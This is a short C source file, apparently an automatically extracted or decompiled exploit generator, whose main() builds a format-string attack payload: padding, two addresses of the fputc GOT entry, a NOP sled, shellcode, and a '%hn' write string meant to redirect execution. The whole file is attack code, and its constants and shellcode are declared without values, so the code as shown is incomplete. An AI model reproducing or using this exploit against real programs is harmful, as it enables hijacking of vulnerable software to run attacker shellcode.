
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int BUFSIZ ;
 int DUMMY ;
 int FMTNUM1 ;
 int FMTNUM2 ;
 scalar_t__ FPUTCGOT ;
 int NOP ;
 int NOPSPACE ;
 int PADDING ;
 int STACKPOP ;
 int memcpy (char*,int ,int ) ;
 int memset (char*,int,int) ;
 int printf (char*,char*) ;
 int shellcode ;
 int sprintf (char*,char*,int,int,int,int) ;
 int strlen (int ) ;

main()
{
 char xplbuf[BUFSIZ];
 char *p = xplbuf;


 memset(p, 0x00, BUFSIZ);


 memset(p, DUMMY, PADDING);
 p += PADDING;


 *((void **)p) = (void *) FPUTCGOT;
 p += 4;
 *((void **)p) = (void *) FPUTCGOT+2;
 p += 4;


 memset(p, NOP, NOPSPACE);
 p += NOPSPACE;


 memcpy(p, shellcode, strlen(shellcode));
 p += strlen(shellcode);


 sprintf(p, "%%%dx%%%d$hn%%%dx%%%d$hn", FMTNUM1, STACKPOP, FMTNUM2, STACKPOP+1);


 printf("%s", xplbuf);
}
